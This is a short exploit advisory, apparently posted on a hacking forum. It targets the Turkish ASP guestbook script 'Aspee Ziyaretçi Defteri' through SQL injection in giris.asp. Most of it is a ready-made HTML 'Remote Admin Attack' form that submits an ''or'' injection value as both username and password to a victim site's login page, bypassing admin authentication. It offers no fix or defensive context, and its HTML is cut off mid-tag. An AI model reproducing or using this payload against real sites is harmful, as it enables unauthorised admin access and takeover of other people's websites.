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Aspee Ziyareti Defteri (tr) Sql injection Vuln.

# LiderHack.Org

# Script name : Aspee Ziyaretçi Defteri (tr)

# Script Download : http://aspindir.com/goster/4575

# Risk : High

# Found By : ShaFuck31

# Thanks : Dekolax , DesquneR , ST@ReXT , SaboTaqe

# Vulnerable file : giris.asp

Manual connect :

Go to Admin Panel Login -----> http://victim.com/[path to script]/admin.asp

Remote connect :

<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title>
<center>ShaFuck31 - LiderHack.Org</center>
<FORM NAME=giris ACTION="http://victim.com/[path to script]/giris.asp" 
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or'" 
<td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or'" 
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>